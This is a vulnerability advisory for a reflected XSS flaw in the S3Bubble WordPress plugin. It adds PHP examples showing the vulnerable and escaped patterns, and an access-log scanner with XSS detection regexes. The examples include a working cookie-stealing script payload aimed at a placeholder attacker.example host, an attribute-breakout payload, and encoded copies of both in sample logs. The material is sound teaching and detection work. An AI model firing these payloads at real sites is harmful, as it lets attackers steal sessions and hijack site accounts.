CVE-2024-13862
Published: 11 March 2025
Description
A reflected cross-site scripting flaw in the S3Bubble Media Streaming (AWS|Elementor|YouTube|Vimeo Functionality) WordPress plugin through version 8.0 lets an unauthenticated attacker run arbitrary script in the browser of a logged-in user who opens a crafted link. Script running in that context may steal the victim's web application session cookies and use them to access the site as the authenticated user without needing credentials.
Security Summary
CVE-2024-13862 is a reflected cross-site scripting (XSS) vulnerability, classified under CWE-79 (Improper Neutralization of Input During Web Page Generation), in the S3Bubble Media Streaming (AWS|Elementor|YouTube|Vimeo Functionality) WordPress plugin through version 8.0. The flaw arises because the plugin neither sanitizes a request parameter on input nor escapes it when writing it back into the page, so a value containing markup is parsed and executed by the browser. It carries a CVSS v3.1 base score of 7.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L), rated High: the flaw is reachable over the network with low attack complexity and no privileges, requires user interaction, and has changed scope because the injected script executes in the victim's browser rather than in the vulnerable component itself.
An unauthenticated attacker (PR:N) exploits it remotely (AV:N) by crafting a link or a page that carries the payload in the reflected parameter and getting a victim to open it (UI:R). Because the payload is reflected rather than stored, the attacker must deliver it to each victim, and the worthwhile targets are users with an authenticated session, above all administrators: the script runs with the full authority of whoever loads the page. Confidentiality, integrity and availability are each rated Low (C:L/I:L/A:L), but in practice that covers stealing the victim's session cookies, issuing authenticated requests on the victim's behalf, and altering or defacing page content in the victim's browser.
Mitigation details are available in the WPScan advisory at https://wpscan.com/vulnerability/7692b768-a33f-45a2-90f1-1f4258493979/. The vulnerability was published on 2025-03-11.
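The following PHP is an added illustration of the flaw class described above; it is not code from the S3Bubble plugin, whose reflected parameter the advisory does not name. The parameter name s3bubble_query, the markup, the attacker domain and the payload are all assumed for the example. The WordPress helpers sanitize_text_field(), esc_attr() and esc_html() are shimmed so the file runs under plain php; inside WordPress the core implementations are used instead.

```php
<?php
// Added illustration for this advisory; it is NOT code from the S3Bubble plugin.
// The parameter name "s3bubble_query" and the markup are hypothetical: the
// advisory says only that an unnamed parameter is reflected unsanitized and
// unescaped. Requires PHP 8 (str_contains).

// Stand-ins for the WordPress helpers so the file runs under plain `php`.
// Inside WordPress these functions already exist and the guards leave the
// real implementations in place.
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field(string $str): string {
        // Rough approximation of WP core: strip tags and control characters, trim.
        $str = strip_tags($str);
        $str = preg_replace('/[\x00-\x1F\x7F]/', '', $str);
        return trim($str);
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $str): string {
        return htmlspecialchars($str, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    function esc_html(string $str): string {
        return htmlspecialchars($str, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

/**
 * Vulnerable pattern (CWE-79): the request value (in a real handler, $_GET)
 * is concatenated straight into an attribute and into element text. A value
 * beginning with `">` closes the attribute, and whatever follows is parsed
 * as markup and executed by the browser.
 */
function render_vulnerable(array $request): string
{
    $q = $request['s3bubble_query'] ?? '';
    return '<input type="text" name="s3bubble_query" value="' . $q . '">'
         . '<p>Results for ' . $q . '</p>';
}

/**
 * Hardened pattern: normalise the input once, then escape for the specific
 * output context at the point of output (esc_attr inside a quoted attribute,
 * esc_html in element text). The escaping is what closes the XSS;
 * sanitize_text_field() is defence in depth, not a substitute for it.
 */
function render_hardened(array $request): string
{
    $q = sanitize_text_field($request['s3bubble_query'] ?? '');
    return '<input type="text" name="s3bubble_query" value="' . esc_attr($q) . '">'
         . '<p>Results for ' . esc_html($q) . '</p>';
}

// Constructed attacker value: breaks out of the attribute and sends the cookie
// jar off-site, the T1539 outcome the advisory describes. attacker.example is
// a placeholder domain.
$payload = '"><script>location="https://attacker.example/?c="+document.cookie</script>';
$request = ['s3bubble_query' => $payload];

$vulnerable = render_vulnerable($request);
$hardened   = render_hardened($request);

echo "vulnerable: $vulnerable\n";
echo "hardened:   $hardened\n";

// The unescaped page carries a live <script> element; the hardened one carries
// only inert entities (&quot;&gt;...) inside an attribute that stays closed.
$ok = str_contains($vulnerable, '<script>')
   && !str_contains($hardened, '<script>')
   && str_contains($hardened, 'value="&quot;&gt;');
echo $ok ? "check passed\n" : "check FAILED\n";
exit($ok ? 0 : 1);
```

Run it with `php xss_reflect.php`. The point is that escaping must match the output context: esc_attr() inside a quoted attribute, esc_html() in element text. Input sanitization alone is not enough; a payload such as `" onfocus="alert(1)" autofocus x="` contains no tags, survives strip_tags() untouched, and still breaks out of an unescaped attribute.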
Details
CWE(s)
- CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected Products
- S3Bubble Media Streaming (AWS|Elementor|YouTube|Vimeo Functionality) WordPress plugin, versions through 8.0
MITRE ATT&CK Enterprise Techniques
- T1204.001 User Execution: Malicious Link
- T1185 Browser Session Hijacking
- T1539 Steal Web Session Cookie
Why these techniques?
Reflected XSS is delivered as a link the victim has to open (T1204.001, User Execution: Malicious Link). Once the injected script runs in an authenticated user's browser it can read the session cookies and send them to the attacker (T1539, Steal Web Session Cookie), or it can skip the theft and issue requests with the victim's live session from inside the page (T1185, Browser Session Hijacking); these are the impacts the summary above describes. Note that marking the session cookie HttpOnly stops script from reading it and so blunts T1539, but it does nothing against T1185, because the browser still attaches the cookie to every request the injected script makes.
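An added detection example for the mapping above, not part of the advisory or of any vendor tooling: a PHP scan over combined-format web server access log lines that flags query strings carrying reflected-XSS payloads. The log lines are constructed, and the endpoint /?s3bubble_query= stands in for the plugin's unnamed reflected parameter; the attacker.example domain is a placeholder.

```php
<?php
// Added example for the ATT&CK mapping above; not part of the advisory or of
// any vendor tooling. The log lines are constructed and the endpoint
// /?s3bubble_query= is a hypothetical stand-in for the unnamed reflected parameter.

// Indicators that a URL carries a reflected-XSS payload (a T1204.001 lure link
// being followed). They are applied to the URL-decoded query string.
const XSS_INDICATORS = [
    'script tag'      => '/<\s*script\b/i',
    'inline handler'  => '/<\s*(img|svg|iframe|body|input|details|video)\b[^>]*\bon\w+\s*=/i',
    'javascript: URL' => '/\bjavascript\s*:/i',
    'cookie access'   => '/\bdocument\.cookie\b/i',
];

/** Split a combined-format access log line into fields; null if the line does not parse. */
function parse_access_log(string $line): ?array
{
    // Assumes the request field holds no unescaped double quotes (Apache and nginx escape them).
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $m[4],
            'status' => (int) $m[5], 'referer' => $m[6], 'ua' => $m[7]];
}

/** Names of the indicators that fire on the query string of $path; [] when clean. */
function xss_indicators(string $path): array
{
    $pos   = strpos($path, '?');
    $query = $pos === false ? '' : substr($path, $pos + 1);
    // Decode twice so double-encoded payloads (%253C -> %3C -> <) are caught too.
    // First pass is form decoding (+ is a space), second pass is %XX only.
    $decoded = rawurldecode(urldecode($query));
    $hits = [];
    foreach (XSS_INDICATORS as $name => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/** Scan log lines and return one alert record per suspicious request. */
function scan_log(array $lines): array
{
    $alerts = [];
    foreach ($lines as $line) {
        $rec = parse_access_log($line);
        if ($rec === null) {
            continue;
        }
        $hits = xss_indicators($rec['path']);
        if ($hits === []) {
            continue;
        }
        // A 200 means the application rendered the page, so the payload was
        // most likely reflected; an off-site referer is consistent with a lure.
        $rec['indicators']       = $hits;
        $rec['reflected_likely'] = $rec['status'] === 200;
        $alerts[] = $rec;
    }
    return $alerts;
}

// Constructed sample: one benign search, one single-encoded cookie-theft payload
// arriving from an attacker-controlled referer, one double-encoded img/onerror payload.
$sample = [
    '198.51.100.7 - - [11/Mar/2025:10:15:01 +0000] "GET /?s3bubble_query=vacation+clips HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Mar/2025:10:17:44 +0000] "GET /?s3bubble_query=%22%3E%3Cscript%3Elocation%3D%22https%3A%2F%2Fattacker.example%2F%3Fc%3D%22%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 5319 "https://attacker.example/lure" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Mar/2025:10:19:02 +0000] "GET /?s3bubble_query=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 5290 "-" "Mozilla/5.0"',
];

foreach (scan_log($sample) as $a) {
    printf("%s %s %s -> %s%s\n", $a['time'], $a['ip'], $a['path'],
           implode(', ', $a['indicators']), $a['reflected_likely'] ? ' (likely reflected)' : '');
}
```

Run it with `php scan_access_log.php`; the first sample line produces no alert, the second fires on the script tag and the cookie access, the third on the inline handler. Because the lure is opened by the victim (T1204.001), the request comes from the victim's address, not the attacker's, so the referer and the decoded payload are the useful pivots, and a 200 response means the page rendered with the payload in it. Decoding twice will also fire on benign values that legitimately contain a literal %25, so tune the indicator list against your own traffic before alerting on it.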